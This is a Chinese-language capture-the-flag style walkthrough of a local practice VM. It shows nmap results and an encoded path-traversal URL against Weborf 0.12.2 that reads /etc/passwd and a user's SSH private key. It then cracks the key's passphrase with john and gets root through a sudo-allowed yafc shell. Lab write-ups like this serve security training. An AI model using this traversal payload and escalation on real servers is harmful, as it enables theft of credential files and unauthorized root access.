# 靶场搭建
下载:Share
下载、导入、Nat
IP: 192.168.1.132
# 渗透过程
# 信息初收集
PORT STATE SERVICE VERSION | |
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0) | |
| ssh-hostkey: | |
| 3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA) | |
| 256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA) | |
|_ 256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519) | |
80/tcp open http Apache httpd 2.4.56 ((Debian)) | |
|_http-title: Apache2 Debian Default Page: It works | |
|_http-server-header: Apache/2.4.56 (Debian) | |
8080/tcp open http-proxy Weborf (GNU/Linux) | |
| http-webdav-scan: | |
| WebDAV type: Apache DAV | |
| Allowed Methods: GET,POST,PUT,DELETE,OPTIONS,PROPFIND,MKCOL,COPY,MOVE | |
|_ Server Type: Weborf (GNU/Linux) | |
| http-methods: | |
|_ Potentially risky methods: PUT DELETE PROPFIND MKCOL COPY MOVE | |
|_http-title: Weborf | |
| fingerprint-strings: | |
| FourOhFourRequest: | |
| HTTP/1.1 404 Page not found: Weborf (GNU/Linux) | |
| Content-Length: 202 | |
| Content-Type: text/html | |
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Weborf</title></head><body> <H1>Error 404</H1>Page not found <p>Generated by Weborf/0.12.2 (GNU/Linux)</p></body></html> | |
| GetRequest: | |
| HTTP/1.1 200 | |
| Server: Weborf (GNU/Linux) | |
| Content-Length: 960 | |
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Weborf</title></head><body><table><tr><td></td><td>Name</td><td>Size</td></tr><tr style="background-color: #DFDFDF;"><td>d</td><td><a href="systemd-private-76ee5a82e5ee4390af4f0c865456aa69-apache2.service-k36Y6i/">systemd-private-76ee5a82e5ee4390af4f0c865456aa69-apache2.service-k36Y6i/</a></td><td>-</td></tr> | |
| style="background-color: #DFDFDF;"><td>d</td><td><a href="systemd-private-76ee5a82e5ee4390af4f0c865456aa69-systemd-logind.service-WKvzLf/">systemd-private-76ee5a82e5ee4390af4f0c865456aa69-systemd-logind.service-WKvzLf/</a></td><td>-</td></tr> | |
| style="background-color: #DFDFDF;"><td>d</td><td><a href="systemd-private-76ee5a82e5ee4390af4f0c865456aa69-systemd-timesyncd.service-mR66hj/">systemd-private-76ee5a82e5ee4390af4f0c865456aa69- | |
| HTTPOptions, RTSPRequest: | |
| HTTP/1.1 200 | |
| Server: Weborf (GNU/Linux) | |
| Allow: GET,POST,PUT,DELETE,OPTIONS,PROPFIND,MKCOL,COPY,MOVE | |
| DAV: 1,2 | |
| DAV: <http://apache.org/dav/propset/fs/1> | |
| MS-Author-Via: DAV | |
| Socks5: | |
| HTTP/1.1 400 Bad request: Weborf (GNU/Linux) | |
| Content-Length: 199 | |
| Content-Type: text/html |
8080 端口能进行 PUT,那就传.
发现 403 了,再收集
发现 Weborf/0.12.2
搜一下,发现 exp: http://192.168.1.132:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
是个 LFI,发现 passwd 只有 root 和 tim 用户有用的
跑一下敏感文件,得到: http://192.168.1.132:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2ftim%2f.ssh%2fid_rsa
拿到了私钥 rsa,使用私钥登录,发现需要一个密码的
哈希解密一下
┌──(root㉿kali)-[~] | |
└─# john --format=SSH id_rsa.hash --wordlist=/usr/share/wordlists/rockyou.txt | |
Using default input encoding: UTF-8 | |
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64]) | |
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes | |
Cost 2 (iteration count) is 2 for all loaded hashes | |
Will run 4 OpenMP threads | |
Press 'q' or Ctrl-C to abort, almost any other key for status | |
ilovetim (id_rsa) | |
1g 0:00:00:00 DONE (2024-05-17 23:21) 2.702g/s 14270p/s 14270c/s 14270C/s badbitch..ilovetim | |
Use the "--show" option to display all of the cracked passwords reliably | |
Session completed. |
密码: ilovetim
# 提权
sudo -l 发现有个 yafc 工具,搜索发现是一个 ftp 的工具
有一个 shell 功能
直接 sudo 使用,执行 shell,OK 了家人拿到 root 权限了
# 小结
约翰约翰约翰!
